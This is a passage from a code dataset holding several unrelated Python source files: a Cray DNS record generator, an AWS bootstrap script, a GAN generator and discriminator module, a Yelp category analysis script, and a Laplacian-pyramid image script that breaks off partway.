empty!\")\n exit(1)\n except config.ConfigException:\n raise Exception(\"Could not configure Kubernetes Python client!\")\n\ncore_v1 = client.CoreV1Api()\n\n# Read the site-init secret and get the domain name.\nsite_init_data = core_v1.read_namespaced_secret(\"site-init\", \"loftsman\")\ncustomizations_data = base64.b64decode(site_init_data.data['customizations.yaml'])\ncustomizations_yaml = yaml.safe_load(customizations_data)\nexternal_dns = customizations_yaml['spec']['network']['dns']['external']\n\n# Build up all the records before writing them out so we can do post-processing on them.\nforward_records = []\nreverse_records = []\n\n###\n# SLS\n###\nurl = \"{}/v1/networks/CAN\".format(args.base_api_address)\nheaders = None\nif token is not None:\n headers = {\"Authorization\": \"Bearer {}\".format(token)}\nresponse = requests.get(url, headers=headers, verify=False).json()\n\n# Need to know what the supernet all the addresses should fit into.\nsupernet = ipaddress.ip_network(response['IPRanges'][0])\n\nfor subnet in response['ExtraProperties']['Subnets']:\n if \"IPReservations\" in subnet:\n for reservation in subnet['IPReservations']:\n fqdn = \"{}.{}\".format(reservation['Name'], external_dns)\n host_ipaddress = ipaddress.ip_address(reservation['IPAddress'])\n add_host(fqdn, host_ipaddress)\n\n if \"Aliases\" in reservation:\n for alias in reservation['Aliases']:\n fqdn = \"{}.{}\".format(alias, external_dns)\n add_host(fqdn, host_ipaddress)\n\n###\n# External DNS\n###\nDUMP_COMMAND = ['sh', '-c', 'ETCDCTL_API=3 etcdctl get --prefix \"\" -w json']\n\npods = core_v1.list_namespaced_pod(NAMESPACE, label_selector=\"etcd_cluster=cray-externaldns-etcd\")\n\n# Pick a random member.\ntarget_etcd_member = random.choice(pods.items)\n\n# Get the records JSON.\ndump_output = stream(core_v1.connect_get_namespaced_pod_exec,\n target_etcd_member.metadata.name,\n NAMESPACE,\n container='etcd',\n command=DUMP_COMMAND,\n stdout=True)\n\n# This is supremely dumb: https://stackoverflow.com/a/55854788/293256\njson_output = json.loads(json.dumps(ast.literal_eval(dump_output)))\nkvs = json_output['kvs']\n\nfor kv in kvs:\n key = str(base64.b64decode(kv['key']))\n key_parts = key.split(\"/\")\n\n # Now for the fun part, we have to build the FQDN off the key parts going from end to beginning. For example:\n # [\"b'\", 'skydns', 'com', 'cray', 'dev', 'shandy', 'vcs', \"3f7d78ec'\"]\n # We need to turn that into vcs.shandy.dev.cray.com. Reverse it and whack off the first 2 and last 1 elements.\n key_parts.reverse()\n fqdn_parts = key_parts[1:-2]\n fqdn = \".\".join(fqdn_parts)\n\n # Now for the actual host information...same basic idea actually, split, reverse, and format.\n value_json = json.loads(base64.b64decode(kv['value']))\n host_ipaddress = ipaddress.ip_address(value_json['host'])\n\n add_host(fqdn, host_ipaddress)\n\n\n###\n# Output\n###\noutput_file = open(args.output_file, \"w\")\noutput_file.write(\"server {} {}\\n\".format(args.dns_server, args.server_port))\n\n# We have updates for two zones, forward and reverse. Start with forward.\nforward_records.sort()\noutput_file.write(\"\\n\\nzone {}\\n\".format(external_dns))\nfor record in forward_records:\n output_file.write(\"{}\\n\".format(record))\n\n# Send the update.\noutput_file.write(\"\\n\\nshow\\nsend\\nanswer\\n\")\n\n# Now reverse. 
First we have to compute what this zone is called.\nreverse_pointer = supernet.network_address.reverse_pointer\nzone_reverse = reverse_pointer.lstrip(\"0.\")\n\nreverse_records.sort()\noutput_file.write(\"\\n\\nzone {}\\n\".format(zone_reverse))\nfor record in reverse_records:\n output_file.write(\"{}\\n\".format(record))\n\n# Send the update.\noutput_file.write(\"\\n\\nshow\\nsend\\nanswer\\n\")\n\n# Close the output file.\noutput_file.close()\n","repo_name":"Cray-HPE/nsupdate-record-generator","sub_path":"generate-dns-records.py","file_name":"generate-dns-records.py","file_ext":"py","file_size_in_byte":6544,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"36054865584","text":"#############################################################################\r\n#\r\n#\r\n#\r\n# DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE\r\n# Version 2, December 2004\r\n#\r\n# Everyone is permitted to copy and distribute verbatim or modified\r\n# copies of this license document, and changing it is allowed as long\r\n# as the name is changed.\r\n#\r\n# DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE,\r\n# TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION\r\n#\r\n# 0. You just DO WHAT THE FUCK YOU WANT TO\r\n#\r\n# -----------------------------------------------------\r\n# Sebastian Novak @ GitHub https://github.com/kernel-memory-dump\r\n# -----------------------------------------------------\r\n#\r\n#\r\n# @author Sebastian Novak\r\n#\r\n#\r\n#############################################################################\r\n\r\nfrom EC2Handler import EC2Handler\r\nfrom Config import Config\r\nfrom Config import *\r\nfrom SQSHandler import SQSHandler\r\nfrom S3Handler import S3Handler\r\nfrom log import *\r\n\r\nINIT_SCRIPT = \"ec2_init_template.sh\"\r\n\r\n\r\ndef main():\r\n\r\n handler = EC2Handler()\r\n config = acquire_config()\r\n\r\n print(\"Creating input/output buckets\")\r\n\r\n s3_input_handle = S3Handler(config.get_input_bucket_name())\r\n s3_input_handle.create_new_public_bucket()\r\n s3_output_handle = S3Handler(config.get_output_bucket_name())\r\n s3_output_handle.create_new_public_bucket()\r\n\r\n print(\"Initializing request/response queues\")\r\n write_to_log(\"Initializing request/response queues\")\r\n sqs_request = SQSHandler(config.get_request_queue_name())\r\n sqs_response = SQSHandler(config.get_response_queue_name())\r\n\r\n print(\"Firing up EC2 server instance...\")\r\n\r\n\r\n write_to_log(\"Initializing EC2 server...\")\r\n handler.create_instance(INIT_SCRIPT)\r\n\r\n if handler.ec2_instance is None:\r\n print(\"Fatal error: failed to create EC2 instance!\")\r\n return\r\n\r\n print(\"Initialization completed! 
Server id is:\" + handler.instance_id)\r\n print(\"Updating config.json, sending acquired server-id\")\r\n config.set_server_id(handler.instance_id)\r\n config.update()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"kernel-memory-dump/mrkirm2-2016-snovak","sub_path":"Project/bootstrap.py","file_name":"bootstrap.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73914987127","text":"import torch\nimport torch.nn as nn\nimport functools\nfrom torch.autograd import Variable\nimport numpy as np\n\nfrom network.bilinear import crop_bbox_batch\nfrom network.layers import GlobalAvgPool\n\n###############################################################################\n# Functions\n###############################################################################\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n m.weight.data.normal_(0.0, 0.02)\n elif classname.find('BatchNorm2d') != -1:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n\ndef get_norm_layer(norm_type='instance'):\n if norm_type == 'batch':\n norm_layer = functools.partial(nn.BatchNorm2d, affine=True)\n elif norm_type == 'instance':\n norm_layer = functools.partial(nn.InstanceNorm2d, affine=False)\n else:\n raise NotImplementedError('normalization layer [%s] is not found' % norm_type)\n return norm_layer\n\ndef define_G(input_nc, output_nc, ngf, netG, n_downsample_global=3, n_blocks_global=9, n_local_enhancers=1, \n n_blocks_local=3, norm='instance'): \n norm_layer = get_norm_layer(norm_type=norm) \n if netG == 'global': \n netG = GlobalGenerator(input_nc, output_nc, ngf, n_downsample_global, n_blocks_global, norm_layer) \n elif netG == 'local': \n netG = LocalEnhancer(input_nc, output_nc, ngf, n_downsample_global, n_blocks_global, \n n_local_enhancers, n_blocks_local, norm_layer)\n elif netG == 'encoder':\n netG = Encoder(input_nc, output_nc, ngf, n_downsample_global, norm_layer)\n else:\n raise('generator not implemented!')\n\n netG.apply(weights_init)\n return netG\n\ndef define_obj_D(vocab, input_nc, crop_size, ndf, n_layers_D, norm='instance', num_D=1, getIntermFeat=False, gpu_ids=[]):\n norm_layer = get_norm_layer(norm_type=norm)\n netD = MultiscaleObjDiscriminator(vocab, input_nc, crop_size, ndf, n_layers_D, norm_layer, num_D, getIntermFeat)\n\n netD.apply(weights_init)\n return netD\n\ndef define_img_D(input_nc, ndf, n_layers_D, norm='instance', num_D=1, getIntermFeat=False, gpu_ids=[]): \n norm_layer = get_norm_layer(norm_type=norm)\n netD = MultiscaleImgDiscriminator(input_nc, ndf, n_layers_D, norm_layer, num_D, getIntermFeat) \n\n netD.apply(weights_init)\n return netD\n\ndef print_network(net):\n if isinstance(net, list):\n net = net[0]\n num_params = 0\n for param in net.parameters():\n num_params += param.numel()\n print(net)\n print('Total number of parameters: %d' % num_params)\n\n##############################################################################\n# Generator\n##############################################################################\nclass LocalEnhancer(nn.Module):\n def __init__(self, input_nc, output_nc, ngf=32, n_downsample_global=3, n_blocks_global=9, \n n_local_enhancers=1, n_blocks_local=3, norm_layer=nn.BatchNorm2d, padding_type='reflect'): \n super(LocalEnhancer, self).__init__()\n self.n_local_enhancers = n_local_enhancers\n\n ###### global generator model ##### \n ngf_global = ngf * (2**n_local_enhancers)\n model_global = 
GlobalGenerator(input_nc, output_nc, ngf_global, n_downsample_global, n_blocks_global, norm_layer).model \n model_global = [model_global[i] for i in range(len(model_global)-3)] # get rid of final convolution layers\n self.model = nn.Sequential(*model_global)\n\n ###### local enhancer layers #####\n for n in range(1, n_local_enhancers+1):\n ### downsample: size / 2\n ngf_global = ngf * (2**(n_local_enhancers-n))\n model_downsample = [nn.ReflectionPad2d(1), nn.Conv2d(input_nc, ngf_global, kernel_size=3, padding=0), \n norm_layer(ngf_global), nn.ReLU(True),\n nn.Conv2d(ngf_global, ngf_global * 2, kernel_size=3, stride=2, padding=1), \n norm_layer(ngf_global * 2), nn.ReLU(True)]\n ### residual blocks\n model_upsample = []\n for i in range(n_blocks_local):\n model_upsample += [ResnetBlock(ngf_global * 2, padding_type=padding_type, norm_layer=norm_layer)]\n\n ### upsample\n model_upsample += [nn.ConvTranspose2d(ngf_global * 2, ngf_global, kernel_size=3, stride=2, padding=1, output_padding=1), \n norm_layer(ngf_global), nn.ReLU(True)]\n\n ### final convolution\n if n == n_local_enhancers: \n model_upsample += [nn.ReflectionPad2d(1), nn.Conv2d(ngf, output_nc, kernel_size=3, padding=0), nn.Tanh()] \n \n setattr(self, 'model'+str(n)+'_1', nn.Sequential(*model_downsample))\n setattr(self, 'model'+str(n)+'_2', nn.Sequential(*model_upsample))\n \n self.downsample = nn.AvgPool2d(3, stride=2, padding=[1, 1], count_include_pad=False)\n\n def forward(self, input):\n ### create input pyramid\n input_downsampled = [input]\n for i in range(self.n_local_enhancers):\n input_downsampled.append(self.downsample(input_downsampled[-1]))\n\n ### output at coarsest level\n output_prev = self.model(input_downsampled[-1]) \n ### build up one layer at a time\n for n_local_enhancers in range(1, self.n_local_enhancers+1):\n model_downsample = getattr(self, 'model'+str(n_local_enhancers)+'_1')\n model_upsample = getattr(self, 'model'+str(n_local_enhancers)+'_2')\n input_i = input_downsampled[self.n_local_enhancers-n_local_enhancers]\n output_prev = model_upsample(model_downsample(input_i) + output_prev)\n return output_prev\n\nclass GlobalGenerator(nn.Module):\n def __init__(self, input_nc, output_nc, ngf=64, n_downsampling=3, n_blocks=9, norm_layer=nn.BatchNorm2d,\n padding_type='reflect'):\n assert(n_blocks >= 0)\n super(GlobalGenerator, self).__init__()\n activation = nn.ReLU(True)\n\n # netG = GlobalGenerator(input_nc, output_nc, ngf, n_downsample_global, n_blocks_global, norm_layer)\n model = [nn.ReflectionPad2d(1), nn.Conv2d(input_nc, ngf, kernel_size=3, padding=0), norm_layer(ngf), activation]\n ### downsample\n for i in range(n_downsampling):\n mult = 2**i\n model += [nn.Conv2d(ngf * mult, ngf * mult * 2, kernel_size=3, stride=2, padding=1),\n norm_layer(ngf * mult * 2), activation]\n\n ### resnet blocks\n mult = 2**n_downsampling\n for i in range(n_blocks):\n model += [ResnetBlock(ngf * mult, padding_type=padding_type, activation=activation, norm_layer=norm_layer)]\n\n ### upsample\n for i in range(n_downsampling):\n mult = 2**(n_downsampling - i)\n model += [nn.ConvTranspose2d(ngf * mult, int(ngf * mult / 2), kernel_size=3, stride=2, padding=1, output_padding=1),\n norm_layer(int(ngf * mult / 2)), activation]\n model += [nn.ReflectionPad2d(1), nn.Conv2d(ngf, output_nc, kernel_size=3, padding=0), nn.Tanh()]\n self.model = nn.Sequential(*model)\n\n def forward(self, input):\n return self.model(input)\n\n# Define a resnet block\nclass ResnetBlock(nn.Module):\n def __init__(self, dim, padding_type, norm_layer, 
activation=nn.ReLU(True), use_dropout=False):\n super(ResnetBlock, self).__init__()\n self.conv_block = self.build_conv_block(dim, padding_type, norm_layer, activation, use_dropout)\n\n def build_conv_block(self, dim, padding_type, norm_layer, activation, use_dropout):\n conv_block = []\n p = 0\n if padding_type == 'reflect':\n conv_block += [nn.ReflectionPad2d(1)]\n elif padding_type == 'replicate':\n conv_block += [nn.ReplicationPad2d(1)]\n elif padding_type == 'zero':\n p = 1\n else:\n raise NotImplementedError('padding [%s] is not implemented' % padding_type)\n\n conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p),\n norm_layer(dim),\n activation]\n if use_dropout:\n conv_block += [nn.Dropout(0.5)]\n\n p = 0\n if padding_type == 'reflect':\n conv_block += [nn.ReflectionPad2d(1)]\n elif padding_type == 'replicate':\n conv_block += [nn.ReplicationPad2d(1)]\n elif padding_type == 'zero':\n p = 1\n else:\n raise NotImplementedError('padding [%s] is not implemented' % padding_type)\n conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p),\n norm_layer(dim)]\n\n return nn.Sequential(*conv_block)\n\n def forward(self, x):\n out = x + self.conv_block(x)\n return out\n\nclass Encoder(nn.Module):\n def __init__(self, input_nc, output_nc, ngf=32, n_downsampling=4, norm_layer=nn.BatchNorm2d):\n super(Encoder, self).__init__()\n self.output_nc = output_nc\n\n model = [nn.ReflectionPad2d(3), nn.Conv2d(input_nc, ngf, kernel_size=7, padding=0),\n norm_layer(ngf), nn.ReLU(True)]\n ### downsample\n for i in range(n_downsampling):\n mult = 2**i\n model += [nn.Conv2d(ngf * mult, ngf * mult * 2, kernel_size=3, stride=2, padding=1),\n norm_layer(ngf * mult * 2), nn.ReLU(True)]\n\n ### upsample\n for i in range(n_downsampling):\n mult = 2**(n_downsampling - i)\n model += [nn.ConvTranspose2d(ngf * mult, int(ngf * mult / 2), kernel_size=3, stride=2, padding=1, output_padding=1),\n norm_layer(int(ngf * mult / 2)), nn.ReLU(True)]\n\n model += [nn.ReflectionPad2d(3), nn.Conv2d(ngf, output_nc, kernel_size=7, padding=0), nn.Tanh()]\n self.model = nn.Sequential(*model)\n\n def forward(self, input, inst):\n outputs = self.model(input)\n\n # instance-wise average pooling\n outputs_mean = outputs.clone()\n inst_list = np.unique(inst.cpu().numpy().astype(int))\n for i in inst_list:\n for b in range(input.size()[0]):\n indices = (inst[b:b+1] == int(i)).nonzero() # n x 4\n for j in range(self.output_nc):\n output_ins = outputs[indices[:,0] + b, indices[:,1] + j, indices[:,2], indices[:,3]]\n mean_feat = torch.mean(output_ins).expand_as(output_ins)\n outputs_mean[indices[:,0] + b, indices[:,1] + j, indices[:,2], indices[:,3]] = mean_feat\n return outputs_mean\n\nclass MultiscaleImgDiscriminator(nn.Module):\n def __init__(self, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d,\n num_D=3, getIntermFeat=False):\n super(MultiscaleImgDiscriminator, self).__init__()\n self.num_D = num_D\n self.n_layers = n_layers\n self.getIntermFeat = getIntermFeat\n\n for i in range(num_D):\n netD = NLayerImgDiscriminator(i, input_nc, ndf, n_layers, norm_layer, getIntermFeat)\n if getIntermFeat:\n for j in range(n_layers+3 - i):\n setattr(self, 'scale'+str(i)+'_layer'+str(j), getattr(netD, 'model'+str(j)))\n else:\n setattr(self, 'layer'+str(i), netD.model)\n\n self.downsample = nn.AvgPool2d(3, stride=2, padding=[1, 1], count_include_pad=False)\n\n def singleD_forward(self, model, input):\n if self.getIntermFeat:\n result = [input]\n for i in range(len(model)):\n result.append(model[i](result[-1]))\n\n return result[1:]\n 
else:\n return [model(input)]\n\n def forward(self, input):\n num_D = self.num_D\n result = []\n input_downsampled = input\n for i in range(num_D):\n if self.getIntermFeat:\n model = [getattr(self, 'scale'+str(i)+'_layer'+str(j)) for j in range(self.n_layers+2-i)]\n else:\n model = getattr(self, 'layer'+str(i))\n result.append(self.singleD_forward(model, input_downsampled))\n if i != (num_D-1):\n input_downsampled = self.downsample(input_downsampled)\n return result\n\n# Defines the PatchGAN discriminator with the specified arguments.\nclass NLayerImgDiscriminator(nn.Module):\n def __init__(self, ind, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d, getIntermFeat=False):\n super(NLayerImgDiscriminator, self).__init__()\n self.getIntermFeat = getIntermFeat\n self.n_layers = n_layers\n\n kw = 4\n padw = 0\n\n nf = ndf\n sequence = [[nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw), \n norm_layer(nf), nn.LeakyReLU(0.2, True)]]\n\n for n in range(0, n_layers-ind):\n nf_prev = nf\n nf = min(nf * 2, 512)\n if n == n_layers-ind:\n sequence += [[\n nn.Conv2d(nf_prev, nf, kernel_size=kw, stride=2, padding=padw),\n nn.LeakyReLU(0.2, True)\n ]]\n else:\n sequence += [[\n nn.Conv2d(nf_prev, nf, kernel_size=kw, stride=2, padding=padw),\n norm_layer(nf), nn.LeakyReLU(0.2, True)\n ]]\n\n sequence += [[nn.Conv2d(nf, 256, kernel_size=4, stride=2, padding=padw)]]\n sequence += [[nn.Conv2d(256, 1, kernel_size=1, stride=1)]]\n\n if getIntermFeat:\n for n in range(len(sequence)):\n setattr(self, 'model'+str(n), nn.Sequential(*sequence[n]))\n else:\n sequence_stream = []\n for n in range(len(sequence)):\n sequence_stream += sequence[n]\n self.model = nn.Sequential(*sequence_stream)\n \n def forward(self, input):\n if self.getIntermFeat:\n res = [input]\n for n in range(self.n_layers+3):\n model = getattr(self, 'model'+str(n))\n res.append(model(res[-1]))\n return res[1:]\n else:\n return self.model(input)\n\nclass MultiscaleObjDiscriminator(nn.Module):\n def __init__(self, vocab, input_nc, crop_size, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d,\n num_D=3, getIntermFeat=False):\n super(MultiscaleObjDiscriminator, self).__init__()\n self.vocab = vocab\n self.num_D = num_D\n self.n_layers = n_layers\n self.getIntermFeat = getIntermFeat\n self.crop_size = crop_size\n\n for i in range(num_D):\n netD = NLayerObjDiscriminator(i, self.vocab, input_nc, ndf, n_layers, norm_layer, getIntermFeat)\n if getIntermFeat:\n for j in range(n_layers+3 - i):\n setattr(self, 'scale'+str(i)+'_layer'+str(j), getattr(netD, 'model'+str(j)))\n else:\n setattr(self, 'layer'+str(i), netD.model)\n \n setattr(self, 'class_real'+str(i), netD.class_real)\n setattr(self, 'class_obj'+str(i), netD.class_obj)\n\n self.downsample = nn.AvgPool2d(3, stride=2, padding=[1, 1], count_include_pad=False)\n\n def singleD_forward(self, model, real_classifier, obj_classifier, input, boxes, obj_to_img):\n if self.getIntermFeat:\n # result = results from intermediate layers\n # real_scores = real or fake\n # obj_scores = obj classification score\n # cropped_input = crop_bbox_batch(input, boxes, obj_to_img, self.crop_size)\n result = [input]\n for i in range(len(model)):\n result.append(model[i](result[-1]))\n\n real_scores = real_classifier(result[-1])\n obj_scores = obj_classifier(result[-1])\n return result[1:], real_scores, obj_scores\n else:\n model_out = model(input)\n real_scores = real_classifier(model_out)\n obj_scores = obj_classifier(model_out)\n return real_scores, obj_scores\n\n def forward(self, input, boxes, 
obj_to_img):\n num_D = self.num_D\n result = []\n obj_crop = self.crop_size\n input_downsampled = crop_bbox_batch(input, boxes, obj_to_img, obj_crop)\n for i in range(num_D):\n if self.getIntermFeat:\n model = [getattr(self, 'scale'+str(i)+'_layer'+str(j)) for j in range(self.n_layers+3-i)]\n else:\n model = getattr(self, 'layer'+str(i))\n\n real_classifier = getattr(self, 'class_real'+str(i))\n obj_classifier = getattr(self, 'class_obj'+str(i))\n result.append(self.singleD_forward(model, real_classifier, obj_classifier, input_downsampled, boxes, obj_to_img))\n if i != (num_D-1):\n obj_crop = obj_crop // 2\n input_downsampled = crop_bbox_batch(self.downsample(input), boxes, obj_to_img, obj_crop)\n return result\n\n# Defines the discriminator with the specified arguments.\nclass NLayerObjDiscriminator(nn.Module):\n def __init__(self, ind, vocab, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d, getIntermFeat=False):\n super(NLayerObjDiscriminator, self).__init__()\n self.getIntermFeat = getIntermFeat\n self.n_layers = n_layers\n self.vocab = vocab\n\n kw = 4\n padw = 0\n\n sequence = [[nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw), \n norm_layer(ndf), nn.LeakyReLU(0.2, True)]]\n\n nf = ndf\n for n in range(0, n_layers - ind):\n nf_prev = nf\n nf = min(nf * 2, 512)\n sequence += [[\n nn.Conv2d(nf_prev, nf, kernel_size=kw, stride=2, padding=padw),\n norm_layer(nf), nn.LeakyReLU(0.2, True)\n ]]\n\n nf_prev = nf\n nf = min(nf * 2, 512)\n\n sequence += [[nn.Conv2d(nf_prev, nf, kernel_size=4, stride=2, padding=padw)]]\n sequence += [[GlobalAvgPool(), nn.Linear(nf, 1024)]]\n\n if getIntermFeat:\n for n in range(len(sequence)):\n setattr(self, 'model'+str(n), nn.Sequential(*sequence[n]))\n else:\n sequence_stream = []\n for n in range(len(sequence)):\n sequence_stream += sequence[n]\n self.model = nn.Sequential(*sequence_stream)\n\n num_objects = len(vocab['object_idx_to_name'])\n self.class_real = nn.Linear(1024, 1)\n self.class_obj = nn.Linear(1024, num_objects)\n\n def forward(self, input):\n if self.getIntermFeat:\n res = [input]\n for n in range(self.n_layers+2):\n model = getattr(self, 'model'+str(n))\n res.append(model(res[-1]))\n\n real_score = self.class_real(res[-1])\n obj_score = self.class_obj(res[-1])\n return res[1:]\n else:\n model_out = self.model(input)\n real_score = self.class_real(model_out)\n obj_score = self.class_obj(model_out)\n\n return model_out, real_score, obj_score\n","repo_name":"arcestalavera/sg-pix","sub_path":"network/pix2pix/networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":19123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25316861648","text":"import requests\nimport os\nimport dill\nimport time\nimport pandas as pd\n\n#Extracting and compiling information from dill files containing yelp data\ndict_1 = dill.load(open('dict_latlong_batch1.pkd', 'rb'))\ndict_2 = dill.load(open('dict_latlong_batch2.pkd', 'rb'))\ndict_3 = dill.load(open('dict_latlong_batch3.pkd', 'rb'))\n\ndict_all=[]\ndict_all=dict_1\nfor j in range(0,2000):\n dict_all[2000+j]=dict_2[j]\nfor j in range(len(dict_3)):\n dict_all[4000+j]=dict_3[j]\n\n#Converting to dictionary and adding h3_loc to relate to lat long information of hexagons\ndf_dict=pd.DataFrame()\nj=0\nfor i in range(len(dict_all)):\n df_1=pd.DataFrame(dict_all[i])\n df_1['h3_loc']=i\n print(j)\n j+=1\n df_dict=df_dict.append(df_1,ignore_index=True)\n\n#Dropping locations where same food place occurs multiple times, 
keeping closest hex to food place\ndf_final=df_dict.sort_values('distance').drop_duplicates('id', keep='first')\ndf_final=df_final.sort_values('h3_loc').reset_index()\n\n#Extracting category names\ndf_final1=df_final.reset_index()\ndf2=df_final1['categories'].apply(pd.Series)\n\n#Extracting categories\ntitle1=df2[0].apply(pd.Series)['title']\ntitle1=title1.reset_index()\ntitle1=title1.rename(columns={'index':'level_0','title':'category1'})\n\n#For plotting\ndf_final1=df_final1.merge(title1)\ndf_final1.to_csv('allentrieswCat1.csv')\n\n# Getting top 100 categories\na=title1.groupby('category1').agg('count')\ntop100_category1=a.sort_values('level_0',ascending=False)[0:100]\n\ndf_top100_category1=pd.DataFrame()\nfor i in range(len(top100_category1)):\n df_top100_category1=df_top100_category1.append(df_final1[df_final1['category1']==top100_category1.index[i]])\n\ndf_top100_category1_pivoted=df_top100_category1.pivot_table(index='h3_loc', columns='category1',\n aggfunc=len, fill_value=0).reset_index()\ndf_top100_category1_pivoted = df_top100_category1_pivoted['alias']\ndf_top100_category1_pivoted['h3_loc']=df_top100_category1['h3_loc']\ndf_top100_category1_pivoted=df_top100_category1_pivoted.set_index('h3_loc')\n\n# Saving for ML model\ndf_top100_category1_pivoted.to_csv('ByCategory1top100_pivoted.csv')\n","repo_name":"pratik-pednekar/NewFranchiseLocator","sub_path":"DataAnalysis.py","file_name":"DataAnalysis.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"43895166535","text":"from PIL import Image\nimport cv2\nfrom PIL import Image\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport glob\n\n#Laura\ndef pad_image_to_size(img, patch_size):\n if img.shape[0] or img.shape[1] < patch_size:\n difference_x = patch_size - img.shape[0]\n pad_x1 = difference_x // 2\n pad_x2 = difference_x // 2\n if not difference_x % 2 == 0:\n pad_x2 += 1\n\n difference_y = patch_size - img.shape[1]\n pad_y1 = difference_y // 2\n pad_y2 = difference_y // 2\n if not difference_y % 2 == 0:\n pad_y2 += 1\n\n i = np.pad(img, ((pad_x1, pad_x2), (pad_y1, pad_y2), (0, 0)), 'symmetric')\n return i\n else:\n print(\"WARNING! Not implemented in laplacian_scaling\")\n\ndef remove_pad_from_image(img, orignial_img,patch_size):\n if orignial_img.shape[0] or orignial_img.shape[1] < patch_size:\n difference_x = patch_size - orignial_img.shape[0]\n pad_x1 = difference_x // 2\n pad_x2 = difference_x // 2\n if not difference_x % 2 == 0:\n pad_x2 += 1\n\n difference_y = patch_size - orignial_img.shape[1]\n pad_y1 = difference_y // 2\n pad_y2 = difference_y // 2\n if not difference_y % 2 == 0:\n pad_y2 += 1\n\n i = img[pad_x1:-pad_x2,pad_y1:-pad_y2]\n return i\n else:\n print(\"WARNING! 
Not implemented in laplacian_scaling\")\n\n\n\n#https://theailearner.com/tag/laplacian-pyramid-opencv/\ndef calculate_gaussian_pyramids(img, num_levels):\n lower = img.copy()\n gaussian_pyr = [lower]\n for i in range(num_levels):\n lower = cv2.pyrDown(lower)\n gaussian_pyr.append(np.float32(lower))\n return gaussian_pyr\n\ndef reconstruct(laplacian_pyr):\n laplacian_top = laplacian_pyr[0]\n laplacian_lst = [laplacian_top]\n num_levels = len(laplacian_pyr) - 1\n for i in range(num_levels):\n size = (laplacian_pyr[i + 1].shape[1], laplacian_pyr[i + 1].shape[0])\n laplacian_expanded = cv2.pyrUp(laplacian_top, dstsize=size)\n laplacian_top = cv2.add(laplacian_pyr[i+1], laplacian_expanded)\n laplacian_lst.append(laplacian_top)\n return laplacian_lst\n\n\n# Then calculate the Laplacian pyramid\ndef calculate_laplacian_pyramids(gaussian_pyr):\n laplacian_top = gaussian_pyr[-1]\n num_levels = len(gaussian_pyr) - 1\n\n laplacian_pyr = [laplacian_top]\n for i in range(num_levels, 0, -1):\n size = (gaussian_pyr[i - 1].shape[1], gaussian_pyr[i - 1].shape[0])\n gaussian_expanded = cv2.pyrUp(gaussian_pyr[i], dstsize=size)\n laplacian = np.subtract(gaussian_pyr[i - 1], gaussian_expanded)\n laplacian_pyr.append(laplacian)\n return laplacian_pyr\n\nif __name__ == '__main__':\n # path = \"/home/laurawenderoth/Documents/kidney_microscopy/data/PAS/CKD154-003-PAS-fully-aligned.png\"\n # img = Image.open(path)\n # img = np.array(img)\n # #new image\n # path = \"/home/laurawenderoth/Documents/kidney_microscopy/data/IF/CKD154-003-IF-fully-aligned.png\"\n # IF = Image.open(path)\n # IF = np.array(IF)\n # lower = img.copy()\n # # Create a Gaussian Pyramid\n # gaussian_pyr = [lower]\n # for i in range(5):\n # lower = cv2.pyrDown(lower)\n # gaussian_pyr.append(lower)\n # # Last level of Gaussian remains same in Laplacian\n # laplacian_top = gaussian_pyr[-1]\n #\n # # Create a Laplacian Pyramid\n # laplacian_pyr = [laplacian_top]\n # for i in range(5, 0, -1):\n # size = (gaussian_pyr[i - 1].shape[1], gaussian_pyr[i - 1].shape[0])\n # gaussian_expanded = cv2.pyrUp(gaussian_pyr[i], dstsize=size)\n # laplacian = cv2.subtract(gaussian_pyr[i - 1], gaussian_expanded)\n # laplacian_pyr.append(laplacian)\n # for g in laplacian_pyr:\n # g = np.array(g, dtype=np.uint8)\n # g= g/g.max()\n # print(g.min(),g.max())\n # plt.imshow(g)\n # plt.show()\n\n path = \"/home/laurawenderoth/Documents/kidney_microscopy/data/PAS/CKD154-003-PAS-fully-aligned.png\"\n img = Image.open(path)\n img = np.array(img)\n # down_img = downsampling(img)\n # up_img = laplacian_upsampling(img,down_img)\n\n expo = np.array(img).shape[0].bit_length()\n num_levels = expo - 8\n print(img.shape)\n img_pad = pad_image_to_size(img,2048)\n lower = img_pad.copy()\n gaussian_pyramids = calculate_gaussian_pyramids(np.array(lower), num_levels)\n g = gaussian_pyramids[-1]\n g = np.array(g, dtype=np.uint8)\n print(g.shape)\n #new image\n path = \"/home/laurawenderoth/Documents/kidney_microscopy/data/IF/CKD154-003-IF-fully-aligned.png\"\n IF = Image.open(path)\n IF = np.array(IF)\n img_pad_if = pad_image_to_size(IF, 2048)\n lower_if = img_pad_if.copy()\n gaussian_pyramids_if = calculate_gaussian_pyramids(np.array(lower_if), num_levels)\n g_if = gaussian_pyramids_if[-1]\n g_if= np.array(g_if, dtype=\"float32\")\n\n laplacian_pyramid = calculate_laplacian_pyramids(gaussian_pyramids)\n l_if_pyramids = laplacian_pyramid.copy()\n l_if_pyramids[0] = g_if\n laplacian_lst = reconstruct(l_if_pyramids)\n fertiges_Bild = laplacian_lst[-1]\n #change dtype from float32 to 
